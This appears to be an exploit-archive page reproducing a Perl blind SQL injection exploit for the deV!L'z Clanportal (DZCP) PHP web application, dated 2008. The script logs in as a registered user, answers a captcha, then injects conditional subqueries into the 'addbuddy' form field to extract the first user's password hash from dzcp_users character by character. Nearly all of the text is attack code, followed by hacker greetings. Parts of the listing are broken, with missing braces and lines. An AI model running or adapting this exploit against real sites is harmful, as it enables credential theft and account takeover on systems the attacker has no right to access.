deV!Lz Clanportal [DZCP] <= Blind SQL Injection Exploit

Gerardo Vazquez, Eduardo Arriols 02.11.2008 Verified
Web Application Exploits PHP

Exploit Code

use HTTP::Cookies;
use LWP::UserAgent;
my $ua    = LWP::UserAgent->new( cookie_jar => HTTP::Cookies->new,);
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/' );
print "\n";
$server =   $ARGV[0];
$dir = $ARGV[1];
$username =   $ARGV[2];
$password = $ARGV[3];
if (!$password) { die "Argh! Read teh Usage!\n"; }
$url0 = "http://".$server.$dir."user/index.php";
$url1 = $url0."?action=login&do=yes";
$url2 = $url0."?action=buddys&do=addbuddy";
syswrite(STDOUT, "[x]Connecting...", 16);
$response = $ua->get($url0);
if($response->is_success) {syswrite(STDOUT, "OK", 2);} else { print "\n[x]Ey I couldn't connect to ".$url0; exit;}
print "\n";
$captcha = ($response->content =~ m/secure=login/i) ? 1 : 0;
if($captcha) { captcha(); }
$response = (!$captcha) ? $ua->post($url1, [ "user" => $username, "pwd" => $password ]) : $ua->post($url1, [ "user" => $username, "pwd" => $password , "secure" => $imgCode]);
if($response->content =~ m/Sicherheitsscode/i) { print "[x]Lol you gave me wrong image code. Restart!"; exit; }
elsif($response->content =~ m/gesperrt/i) { print "[x]Omg you gave me wrong user details. Restart!"; exit; }
$response = $ua->get($url2);
print "[x]Kay, unleashing BlackMagic now. Getta Coffee and wait!!\n";
my @Daten;
my $operator;
syswrite(STDOUT, "[x]Password: ", 13);
for($b=1;$b<=32;$b++) { inject(0,16); }
print "\n[x]OmFg I made it!!\n";
print "[x]Have FUN!\n";
print "[x]Greetz & Shoutz go to: IP-Sh0k, haZl0oh, bizzit, NoNePub, thund3r ,ramon,\n";
print "   J0hn.X3r, electron1x, Paloxus, -tmh- aka B-Baerchi, Nazrek aka Patrick_B, WooMic, codeblu815\n";
print "   Free-Hack, Sys-Flaw, SoH and h4ck-y0u!\n";
print "[x]Biggest Thanks go to Shadowleet aka \$h4d0wl33t who is simply the best at his stuff!";
sub hex_to_ascii($)
        (my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;
        return $str;
sub inject 
    $beg = $_[0]; $end = $_[1];   
    $mid = int(($beg + $end)/2); #print $mid."\n";
        syswrite(STDOUT, hex_to_ascii($Daten[$mid]), 1);                 
    elsif(&bigger($mid)) { return inject($mid + 1, $end); }   
    else { return inject($beg, $mid - 1); }       
sub equals { $ack = $_[0]; if( &request("=", $ack) !~ m/1242/i) { return 1; } }
sub bigger { $ack = $_[0]; if(&request(">", $ack) !~ m/1242/i) { return 1; } }
sub request
    $operator = $_[0]; $bick = $_[1];                             #probably only users without dzcp_
    $response = $ua->post($url2, [ "users" => "999 and if(substring((select pwd from dzcp_users limit 0,1),".$b.",1)".$operator."0x".$Daten[$bick].",null,(select 1 union select 2))" ]);
    #print $response->content;
    return $response->content;
sub usage()
    print q
    ------------------NON PUBLIC EXPLOIT-----------------
            deV!L`z Clanportal BlackMagic EXPLOIT         
                  -Exploit coded by h0yt3r-             
     Usage: [Server] [Path] [Username] [Password]
     perl /devilz/ h0yt3r 1337 
     Exploit requires Username and Password, as the vul-
     nerable file is only visible for registered users! 
sub captcha
    print "[x]Captcha required!\n";
    $captchaURL = "http://".$server.$dir."/antispam.php?secure=login";
    my $captchaReq= $ua->get($captchaURL);
    binmode IMG;
    print IMG $captchaReq->content;
    close IMG;
    system('start captcha.jpg');
    print "[x]Image Code: ";
    $imgCode = <STDIN>;
sub array
    for($b=30;$b<=39; $b++) { push(@Daten,$b); }
    for($b=61;$b<=66; $b++) { push(@Daten,$b); }

# [2008-11-02]